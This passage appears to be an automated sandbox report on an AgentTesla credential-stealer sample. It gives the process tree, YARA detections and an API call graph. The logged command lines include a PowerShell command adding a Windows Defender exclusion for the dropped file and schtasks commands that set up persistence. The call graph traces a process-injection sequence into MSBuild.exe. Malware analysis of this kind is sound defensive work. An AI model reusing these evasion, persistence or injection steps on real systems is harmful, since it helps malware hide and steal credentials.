                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
                                            Imagebase:0x410000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"
                                            Imagebase:0x4b0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            Imagebase:0xbd0000
                                            File size:262'432 bytes
                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:17:14:04
                                            Start date:19/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            Imagebase:0x160000
                                            File size:1'031'168 bytes
                                            MD5 hash:25E87D17F0C864FFDC217D43C82CC36C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 37%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:17:14:04
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff717f30000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:17:14:06
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"
                                            Imagebase:0x4b0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:17:14:06
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:17:14:06
                                            Start date:19/04/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            Imagebase:0x520000
                                            File size:262'432 bytes
                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:12.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:273
                                              Total number of Limit Nodes:16
                                              execution_graph 23361 186d300 DuplicateHandle 23362 186d396 23361->23362 23590 178dc90 23591 178de1b 23590->23591 23593 178dcb6 23590->23593 23593->23591 23594 178acd0 23593->23594 23595 178df10 PostMessageW 23594->23595 23596 178df7c 23595->23596 23596->23593 23363 1789ba4 23364 1789acc 23363->23364 23365 1789ae5 23363->23365 23369 178cab8 23365->23369 23391 178cb16 23365->23391 23414 178caa8 23365->23414 23370 178cad2 23369->23370 23371 178caf6 23370->23371 23436 178d0d8 23370->23436 23445 178d407 23370->23445 23451 178cf86 23370->23451 23457 178cfc6 23370->23457 23462 178d226 23370->23462 23467 178cf01 23370->23467 23471 178d08c 23370->23471 23476 178d4aa 23370->23476 23482 178d3aa 23370->23482 23488 178cfa8 23370->23488 23494 178cf57 23370->23494 23500 178d114 23370->23500 23505 178d133 23370->23505 23509 178cf92 23370->23509 23514 178d0b2 23370->23514 23519 178d19d 23370->23519 23524 178d37d 23370->23524 23529 178d4fc 23370->23529 23533 178cff9 23370->23533 23371->23364 23392 178caa4 23391->23392 23394 178cb19 23391->23394 23393 178caf6 23392->23393 23395 178d0d8 2 API calls 23392->23395 23396 178cff9 2 API calls 23392->23396 23397 178d4fc 2 API calls 23392->23397 23398 178d37d 2 API calls 23392->23398 23399 178d19d 2 API calls 23392->23399 23400 178d0b2 2 API calls 23392->23400 23401 178cf92 2 API calls 23392->23401 23402 178d133 2 API calls 23392->23402 23403 178d114 2 API calls 23392->23403 23404 178cf57 3 API calls 23392->23404 23405 178cfa8 3 API calls 23392->23405 23406 178d3aa 3 API calls 23392->23406 23407 178d4aa 3 API calls 23392->23407 23408 178d08c 2 API calls 23392->23408 23409 178cf01 2 API calls 23392->23409 23410 178d226 2 API calls 23392->23410 23411 178cfc6 2 API calls 23392->23411 23412 178cf86 3 API calls 23392->23412 23413 178d407 3 API calls 23392->23413 23393->23364 23394->23364 23395->23393 23396->23393 23397->23393 23398->23393 23399->23393 23400->23393 23401->23393 23402->23393 23403->23393 23404->23393 23405->23393 23406->23393 23407->23393 23408->23393 23409->23393 23410->23393 23411->23393 23412->23393 23413->23393 23415 178cad2 23414->23415 23416 178caf6 23415->23416 23417 178d0d8 2 API calls 23415->23417 23418 178cff9 2 API calls 23415->23418 23419 178d4fc 2 API calls 23415->23419 23420 178d37d 2 API calls 23415->23420 23421 178d19d 2 API calls 23415->23421 23422 178d0b2 2 API calls 23415->23422 23423 178cf92 2 API calls 23415->23423 23424 178d133 2 API calls 23415->23424 23425 178d114 2 API calls 23415->23425 23426 178cf57 3 API calls 23415->23426 23427 178cfa8 3 API calls 23415->23427 23428 178d3aa 3 API calls 23415->23428 23429 178d4aa 3 API calls 23415->23429 23430 178d08c 2 API calls 23415->23430 23431 178cf01 2 API calls 23415->23431 23432 178d226 2 API calls 23415->23432 23433 178cfc6 2 API calls 23415->23433 23434 178cf86 3 API calls 23415->23434 23435 178d407 3 API calls 23415->23435 23416->23364 23417->23416 23418->23416 23419->23416 23420->23416 23421->23416 23422->23416 23423->23416 23424->23416 23425->23416 23426->23416 23427->23416 23428->23416 23429->23416 23430->23416 23431->23416 23432->23416 23433->23416 23434->23416 23435->23416 23437 178d0dd 23436->23437 23438 178d066 23436->23438 23439 178d055 23438->23439 23443 17891e8 VirtualAllocEx 23438->23443 23542 17891e7 23438->23542 23440 178d0cc 23439->23440 23442 17891e7 VirtualAllocEx 23439->23442 23538 17891e8 23439->23538 23442->23439 23443->23439 23447 178cf57 23445->23447 23446 178d03c 23446->23371 23447->23371 23447->23446 23546 1789058 23447->23546 23550 1789060 23447->23550 23554 178905f 23447->23554 23452 178cf57 23451->23452 23452->23371 23453 178d03c 23452->23453 23454 1789058 ResumeThread 23452->23454 23455 178905f ResumeThread 23452->23455 23456 1789060 ResumeThread 23452->23456 23453->23371 23454->23452 23455->23452 23456->23452 23458 178cf94 23457->23458 23459 178cfcd 23457->23459 23558 17892a8 23458->23558 23562 17892a7 23458->23562 23459->23371 23463 178d770 23462->23463 23566 1789108 23463->23566 23570 1789110 23463->23570 23464 178d78b 23464->23371 23574 178952f 23467->23574 23578 1789530 23467->23578 23472 178d0ab 23471->23472 23474 17892a8 WriteProcessMemory 23472->23474 23475 17892a7 WriteProcessMemory 23472->23475 23473 178d206 23473->23371 23474->23473 23475->23473 23477 178cf57 23476->23477 23477->23371 23478 178d03c 23477->23478 23479 1789058 ResumeThread 23477->23479 23480 178905f ResumeThread 23477->23480 23481 1789060 ResumeThread 23477->23481 23478->23371 23479->23477 23480->23477 23481->23477 23484 178cf57 23482->23484 23483 178d03c 23483->23371 23484->23371 23484->23483 23485 1789058 ResumeThread 23484->23485 23486 178905f ResumeThread 23484->23486 23487 1789060 ResumeThread 23484->23487 23485->23484 23486->23484 23487->23484 23489 178cf57 23488->23489 23489->23371 23490 178d03c 23489->23490 23491 1789058 ResumeThread 23489->23491 23492 178905f ResumeThread 23489->23492 23493 1789060 ResumeThread 23489->23493 23490->23371 23491->23489 23492->23489 23493->23489 23495 178cf60 23494->23495 23495->23371 23495->23494 23496 178d03c 23495->23496 23497 1789058 ResumeThread 23495->23497 23498 178905f ResumeThread 23495->23498 23499 1789060 ResumeThread 23495->23499 23496->23371 23497->23495 23498->23495 23499->23495 23501 178d42f 23500->23501 23582 1789397 23501->23582 23586 1789398 23501->23586 23502 178d451 23507 17892a8 WriteProcessMemory 23505->23507 23508 17892a7 WriteProcessMemory 23505->23508 23506 178d161 23506->23371 23507->23506 23508->23506 23510 178d09e 23509->23510 23512 17892a8 WriteProcessMemory 23510->23512 23513 17892a7 WriteProcessMemory 23510->23513 23511 178d206 23511->23371 23512->23511 23513->23511 23515 178d0cc 23514->23515 23516 178d055 23514->23516 23516->23514 23517 17891e8 VirtualAllocEx 23516->23517 23518 17891e7 VirtualAllocEx 23516->23518 23517->23516 23518->23516 23520 178d132 23519->23520 23521 178d161 23519->23521 23522 17892a8 WriteProcessMemory 23520->23522 23523 17892a7 WriteProcessMemory 23520->23523 23521->23371 23522->23521 23523->23521 23525 178d470 23524->23525 23527 1789108 Wow64SetThreadContext 23525->23527 23528 1789110 Wow64SetThreadContext 23525->23528 23526 178d48b 23527->23526 23528->23526 23531 17892a8 WriteProcessMemory 23529->23531 23532 17892a7 WriteProcessMemory 23529->23532 23530 178d2af 23531->23530 23532->23530 23534 178d055 23533->23534 23535 178d0cc 23534->23535 23536 17891e8 VirtualAllocEx 23534->23536 23537 17891e7 VirtualAllocEx 23534->23537 23536->23534 23537->23534 23539 1789228 VirtualAllocEx 23538->23539 23541 1789265 23539->23541 23541->23439 23543 1789228 VirtualAllocEx 23542->23543 23545 1789265 23543->23545 23545->23439 23547 178905c ResumeThread 23546->23547 23549 17890d1 23547->23549 23549->23447 23551 17890a0 ResumeThread 23550->23551 23553 17890d1 23551->23553 23553->23447 23555 17890a0 ResumeThread 23554->23555 23557 17890d1 23555->23557 23557->23447 23559 17892f0 WriteProcessMemory 23558->23559 23561 1789347 23559->23561 23561->23459 23563 17892f0 WriteProcessMemory 23562->23563 23565 1789347 23563->23565 23565->23459 23567 178910c Wow64SetThreadContext 23566->23567 23569 178919d 23567->23569 23569->23464 23571 1789155 Wow64SetThreadContext 23570->23571 23573 178919d 23571->23573 23573->23464 23575 17895b9 CreateProcessA 23574->23575 23577 178977b 23575->23577 23579 17895b9 CreateProcessA 23578->23579 23581 178977b 23579->23581 23581->23581 23583 17893e3 ReadProcessMemory 23582->23583 23585 1789427 23583->23585 23585->23502 23587 17893e3 ReadProcessMemory 23586->23587 23589 1789427 23587->23589 23589->23502 23597 1864668 23598 186467a 23597->23598 23599 1864686 23598->23599 23603 1864778 23598->23603 23608 1863e1c 23599->23608 23601 18646a5 23604 186479d 23603->23604 23612 1864888 23604->23612 23616 1864878 23604->23616 23609 1863e27 23608->23609 23624 1865c1c 23609->23624 23611 1866ff0 23611->23601 23614 18648af 23612->23614 23613 186498c 23613->23613 23614->23613 23620 186449c 23614->23620 23617 18648af 23616->23617 23618 186498c 23617->23618 23619 186449c CreateActCtxA 23617->23619 23618->23618 23619->23618 23621 1865918 CreateActCtxA 23620->23621 23623 18659db 23621->23623 23625 1865c27 23624->23625 23628 1865c3c 23625->23628 23627 1867095 23627->23611 23629 1865c47 23628->23629 23632 1865c6c 23629->23632 23631 186717a 23631->23627 23633 1865c77 23632->23633 23636 1865c9c 23633->23636 23635 186726d 23635->23631 23637 1865ca7 23636->23637 23639 1868653 23637->23639 23642 186ad00 23637->23642 23638 1868691 23638->23635 23639->23638 23646 186cdf4 23639->23646 23651 186ad27 23642->23651 23655 186ad38 23642->23655 23643 186ad16 23643->23639 23647 186ce11 23646->23647 23648 186ce35 23647->23648 23684 186cfa0 23647->23684 23688 186cf8f 23647->23688 23648->23638 23652 186ad38 23651->23652 23658 186ae30 23652->23658 23653 186ad47 23653->23643 23657 186ae30 2 API calls 23655->23657 23656 186ad47 23656->23643 23657->23656 23659 186ae41 23658->23659 23660 186ae64 23658->23660 23659->23660 23667 186b11c 23659->23667 23672 186b0b9 23659->23672 23676 186b0c8 23659->23676 23660->23653 23661 186ae5c 23661->23660 23662 186b068 GetModuleHandleW 23661->23662 23663 186b095 23662->23663 23663->23653 23668 186b0c1 23667->23668 23669 186b122 23667->23669 23670 186b101 23668->23670 23680 186a870 23668->23680 23670->23661 23673 186b0c8 23672->23673 23674 186a870 LoadLibraryExW 23673->23674 23675 186b101 23673->23675 23674->23675 23675->23661 23677 186b0dc 23676->23677 23678 186b101 23677->23678 23679 186a870 LoadLibraryExW 23677->23679 23678->23661 23679->23678 23682 186b2a8 LoadLibraryExW 23680->23682 23683 186b321 23682->23683 23683->23670 23685 186cfad 23684->23685 23686 186cfe7 23685->23686 23692 186c8d8 23685->23692 23686->23648 23689 186cfad 23688->23689 23690 186cfe7 23689->23690 23691 186c8d8 2 API calls 23689->23691 23690->23648 23691->23690 23693 186c8dd 23692->23693 23695 186d8f8 23693->23695 23696 186ca04 23693->23696 23695->23695 23697 186ca0f 23696->23697 23698 1865c9c 2 API calls 23697->23698 23699 186d967 23698->23699 23699->23695 23700 186d0b8 23701 186d0fe GetCurrentProcess 23700->23701 23703 186d150 GetCurrentThread 23701->23703 23704 186d149 23701->23704 23705 186d186 23703->23705 23706 186d18d GetCurrentProcess 23703->23706 23704->23703 23705->23706 23707 186d1c3 23706->23707 23708 186d1eb GetCurrentThreadId 23707->23708 23709 186d21c 23708->23709

                                              Executed Functions

                                              Function 0186D0A8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0186D136
                                              • GetCurrentThread.KERNEL32 ref: 0186D173
                                              • GetCurrentProcess.KERNEL32 ref: 0186D1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 0186D209
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID: <3Z
                                              • API String ID: 2063062207-3925590025
                                              • Opcode ID: 57de9eb9d3d57087ebafbce64d8456d5cae07ab91bd45230a4d800858801097f
                                              • Instruction ID: 108ca3129468e166c17a251531a1a3f801011af60fc8a8e32a81657f33561c16
                                              • Opcode Fuzzy Hash: 57de9eb9d3d57087ebafbce64d8456d5cae07ab91bd45230a4d800858801097f
                                              • Instruction Fuzzy Hash: EE5175B0A01649CFDB14DFAAD548BDEBBF1EF88310F208559E109A7360DB346984CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186D0B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0186D136
                                              • GetCurrentThread.KERNEL32 ref: 0186D173
                                              • GetCurrentProcess.KERNEL32 ref: 0186D1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 0186D209
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID: <3Z
                                              • API String ID: 2063062207-3925590025
                                              • Opcode ID: 221e20f79a3b5a37706bcc22cc858be664e010d4be35cb3d0ea791befb7b41a9
                                              • Instruction ID: f6d8af04e96cf4d6fadacb94a000848beed30f12af6baf40cc81c141ca827c10
                                              • Opcode Fuzzy Hash: 221e20f79a3b5a37706bcc22cc858be664e010d4be35cb3d0ea791befb7b41a9
                                              • Instruction Fuzzy Hash: 325176B0A01649CFDB04DFAAD548B9EFBF5EF88310F208559E109B7360DB74A984CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01789530 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 101 1789530-17895c5 103 17895fe-178961e 101->103 104 17895c7-17895d1 101->104 109 1789620-178962a 103->109 110 1789657-1789686 103->110 104->103 105 17895d3-17895d5 104->105 107 17895f8-17895fb 105->107 108 17895d7-17895e1 105->108 107->103 111 17895e3 108->111 112 17895e5-17895f4 108->112 109->110 113 178962c-178962e 109->113 120 1789688-1789692 110->120 121 17896bf-1789779 CreateProcessA 110->121 111->112 112->112 114 17895f6 112->114 115 1789630-178963a 113->115 116 1789651-1789654 113->116 114->107 118 178963c 115->118 119 178963e-178964d 115->119 116->110 118->119 119->119 122 178964f 119->122 120->121 123 1789694-1789696 120->123 132 178977b-1789781 121->132 133 1789782-1789808 121->133 122->116 125 1789698-17896a2 123->125 126 17896b9-17896bc 123->126 127 17896a4 125->127 128 17896a6-17896b5 125->128 126->121 127->128 128->128 129 17896b7 128->129 129->126 132->133 143 1789818-178981c 133->143 144 178980a-178980e 133->144 145 178982c-1789830 143->145 146 178981e-1789822 143->146 144->143 147 1789810 144->147 149 1789840-1789844 145->149 150 1789832-1789836 145->150 146->145 148 1789824 146->148 147->143 148->145 152 1789856-178985d 149->152 153 1789846-178984c 149->153 150->149 151 1789838 150->151 151->149 154 178985f-178986e 152->154 155 1789874 152->155 153->152 154->155 156 1789875 155->156 156->156
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01789766
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: <3Z$<3Z
                                              • API String ID: 963392458-2007775535
                                              • Opcode ID: e42725109e1b4a14fe24d74ce1a53a6234309900902c07ff921c410f1ded7ee3
                                              • Instruction ID: cc8889b453e31a8597b9cdb9c868e0ac0744198ab838f1cf0dba2fdf989a86d4
                                              • Opcode Fuzzy Hash: e42725109e1b4a14fe24d74ce1a53a6234309900902c07ff921c410f1ded7ee3
                                              • Instruction Fuzzy Hash: 0D914B71D00219DFEB20DF69C841BEDFBB2BF88318F1481A9E909A7240DB749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0178952F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 44 178952f-17895c5 46 17895fe-178961e 44->46 47 17895c7-17895d1 44->47 52 1789620-178962a 46->52 53 1789657-1789686 46->53 47->46 48 17895d3-17895d5 47->48 50 17895f8-17895fb 48->50 51 17895d7-17895e1 48->51 50->46 54 17895e3 51->54 55 17895e5-17895f4 51->55 52->53 56 178962c-178962e 52->56 63 1789688-1789692 53->63 64 17896bf-1789779 CreateProcessA 53->64 54->55 55->55 57 17895f6 55->57 58 1789630-178963a 56->58 59 1789651-1789654 56->59 57->50 61 178963c 58->61 62 178963e-178964d 58->62 59->53 61->62 62->62 65 178964f 62->65 63->64 66 1789694-1789696 63->66 75 178977b-1789781 64->75 76 1789782-1789808 64->76 65->59 68 1789698-17896a2 66->68 69 17896b9-17896bc 66->69 70 17896a4 68->70 71 17896a6-17896b5 68->71 69->64 70->71 71->71 72 17896b7 71->72 72->69 75->76 86 1789818-178981c 76->86 87 178980a-178980e 76->87 88 178982c-1789830 86->88 89 178981e-1789822 86->89 87->86 90 1789810 87->90 92 1789840-1789844 88->92 93 1789832-1789836 88->93 89->88 91 1789824 89->91 90->86 91->88 95 1789856-178985d 92->95 96 1789846-178984c 92->96 93->92 94 1789838 93->94 94->92 97 178985f-178986e 95->97 98 1789874 95->98 96->95 97->98 99 1789875 98->99 99->99
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01789766
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: <3Z$<3Z
                                              • API String ID: 963392458-2007775535
                                              • Opcode ID: 7bdc394f69278b900f106edcb19b350f89790ac64ed81350093b687e3f053862
                                              • Instruction ID: 2ca73e9496e2fc989cc1d4d832e4d5442d38da3b1acaf24f818b26e684e02ca1
                                              • Opcode Fuzzy Hash: 7bdc394f69278b900f106edcb19b350f89790ac64ed81350093b687e3f053862
                                              • Instruction Fuzzy Hash: E0914A71D40259DFEB20DF68C841BEDFBB2BF88318F1481A9E909A7240DB749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186AE30 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 158 186ae30-186ae3f 159 186ae41-186ae4e call 1869838 158->159 160 186ae6b-186ae6f 158->160 165 186ae64 159->165 166 186ae50 159->166 162 186ae83-186aec4 160->162 163 186ae71-186ae7b 160->163 169 186aec6-186aece 162->169 170 186aed1-186aedf 162->170 163->162 165->160 213 186ae56 call 186b11c 166->213 214 186ae56 call 186b0c8 166->214 215 186ae56 call 186b0b9 166->215 169->170 171 186af03-186af05 170->171 172 186aee1-186aee6 170->172 177 186af08-186af0f 171->177 174 186aef1 172->174 175 186aee8-186aeef call 186a814 172->175 173 186ae5c-186ae5e 173->165 176 186afa0-186b060 173->176 179 186aef3-186af01 174->179 175->179 208 186b062-186b065 176->208 209 186b068-186b093 GetModuleHandleW 176->209 180 186af11-186af19 177->180 181 186af1c-186af23 177->181 179->177 180->181 183 186af25-186af2d 181->183 184 186af30-186af39 call 186a824 181->184 183->184 189 186af46-186af4b 184->189 190 186af3b-186af43 184->190 191 186af4d-186af54 189->191 192 186af69-186af6d 189->192 190->189 191->192 194 186af56-186af66 call 186a834 call 186a844 191->194 197 186af73-186af76 192->197 194->192 199 186af78-186af96 197->199 200 186af99-186af9f 197->200 199->200 208->209 210 186b095-186b09b 209->210 211 186b09c-186b0b0 209->211 210->211 213->173 214->173 215->173
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0186B086
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: <3Z
                                              • API String ID: 4139908857-3925590025
                                              • Opcode ID: 98a4ecbff755a5598a3320ece542512bffb56d09b2f8f0ed47abf47b33c0ef4e
                                              • Instruction ID: 7979a159c8b1fb157b16ce56f4565bb46f7b083a6ad7b1162095591874f7059c
                                              • Opcode Fuzzy Hash: 98a4ecbff755a5598a3320ece542512bffb56d09b2f8f0ed47abf47b33c0ef4e
                                              • Instruction Fuzzy Hash: 8E7149B0A00B058FDB28DF2AD45475ABBF5FF88704F00892ED44AE7A50DB75EA45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 216 186590c-18659d9 CreateActCtxA 218 18659e2-1865a3c 216->218 219 18659db-18659e1 216->219 226 1865a3e-1865a41 218->226 227 1865a4b-1865a4f 218->227 219->218 226->227 228 1865a60 227->228 229 1865a51-1865a5d 227->229 231 1865a61 228->231 229->228 231->231
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 018659C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
